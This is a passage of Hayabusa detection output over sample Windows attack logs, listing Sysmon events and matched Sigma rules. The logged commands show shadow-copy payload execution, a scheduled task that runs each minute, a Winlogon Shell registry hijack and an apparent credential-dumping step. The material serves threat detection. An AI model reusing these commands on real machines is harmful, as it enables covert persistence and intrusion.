/c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3876 | PGUID: 365ABB72-FE6D-5CEB-0000-0010332A0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.491 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-FE6D-5CEB-0000-0010122D0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.491 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:46.981 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\notepad.exe | PID: 1944 | PGUID: 365ABB72-FD85-5CEB-0000-00104C0E0B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.402 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create 
""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3448 | PGUID: 365ABB72-FE6F-5CEB-0000-0010F4370C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-FE6F-5CEB-0000-0010D33A0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.655 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2412 | PGUID: 365ABB72-FE70-5CEB-0000-0010385C0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.763 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vssadmin List Shadows | Process: C:\Windows\System32\vssadmin.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-FE70-5CEB-0000-0010935F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.827 +09:00,IEWIN7,1,info,,Process Created,"Cmd: find ""Shadow Copy Volume"" | Process: C:\Windows\System32\find.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1796 | PGUID: 365ABB72-FE70-5CEB-0000-0010D65F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.447 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2356 | PGUID: 365ABB72-FE76-5CEB-0000-0010546E0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | LID: 0x3e7 | PID: 2840 | PGUID: 365ABB72-FE76-5CEB-0000-001077710C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.632 +09:00,IEWIN7,1,info,,Process Created,Cmd: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x3e7 | PID: 1260 | PGUID: 365ABB72-FE76-5CEB-0000-001015780C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.632 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.519 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-FE7B-5CEB-0000-0010867F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,,Process 
Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | LID: 0x3e7 | PID: 4044 | PGUID: 365ABB72-FE7B-5CEB-0000-0010D6820C00 | Hash: SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 11:13:52.171 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 2432 | PGUID: 365ABB72-9960-5CEC-0000-0010B6981600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1968 | PGUID: 365ABB72-9960-5CEC-0000-001082AD1600 | Hash: 
SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:53.507 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: IEWIN7\IEUser | Parent Cmd: utilman.exe /debug | LID: 0x14a73 | PID: 2600 | PGUID: 365ABB72-9961-5CEC-0000-0010E1161700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:48.819 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 3092 | PGUID: 365ABB72-9998-5CEC-0000-00107D501700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1128 | PGUID: 365ABB72-9999-5CEC-0000-0010EB5A1700 | Hash: 
SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:50.413 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | LID: 0x14a73 | PID: 1516 | PGUID: 365ABB72-999A-5CEC-0000-0010C3A11700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-29 08:09:38.589 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Startup User Shell Folder Modified | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\startup: c:\programdata\StartupNewHomeAddress | Process: C:\Windows\system32\reg.exe | PID: 1520 | PGUID: 365ABB72-BFB2-5CED-0000-0010F2C03600,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_startup_UserShellStartup_Folder_Changed_sysmon_13.evtx +2019-06-15 07:22:17.988 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1336d | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.503 +09:00,IEWIN7,11,info,,File Created,Path: 
C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Winlogon Shell | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"",explorer.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:31.957 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\Downloads\a.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1008 | PGUID: 
365ABB72-1E1D-5D04-0000-001003E70A00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:31.957 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:32.222 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1584 | PGUID: 365ABB72-1E28-5D04-0000-0010EC030B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:47.253 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1552 | PGUID: 365ABB72-1E37-5D04-0000-001049360B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:52.457 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 
07:22:52.503 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.441 +09:00,IEWIN7,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 688 | PGUID: 365ABB72-1E3F-5D04-0000-0010EC890B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.503 +09:00,IEWIN7,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 488 | PGUID: 365ABB72-1E3F-5D04-0000-0010568A0B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.566 +09:00,IEWIN7,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 1228 | PGUID: 365ABB72-1E3F-5D04-0000-0010FF8D0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.707 
+09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 948 | PGUID: 365ABB72-1E3F-5D04-0000-00102B9C0B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:06.691 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Process: C:\Windows\System32\dllhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-1E4A-5D04-0000-0010ECC20B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.019 +09:00,IEWIN7,1,info,,Process Created,Cmd: efsui.exe /efs /keybackup | Process: C:\Windows\System32\efsui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0xbc013 | PID: 2264 | PGUID: 365ABB72-1E4A-5D04-0000-0010BACF0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.082 +09:00,IEWIN7,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 1628 | PGUID: 365ABB72-1E4A-5D04-0000-001016D70B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.894 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 3448 | 
PGUID: 365ABB72-1E51-5D04-0000-00104C340C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3444 | PGUID: 365ABB72-1E51-5D04-0000-00107B380C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Evas,Suspicious Userinit Child Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,../hayabusa-rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.972 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3620 | PGUID: 365ABB72-1E51-5D04-0000-001065390C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:15.054 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\VBoxTray.exe"" | Process: C:\Windows\System32\VBoxTray.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 3920 | PGUID: 
365ABB72-1E52-5D04-0000-00101D700C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:16.592 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:23.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 2040 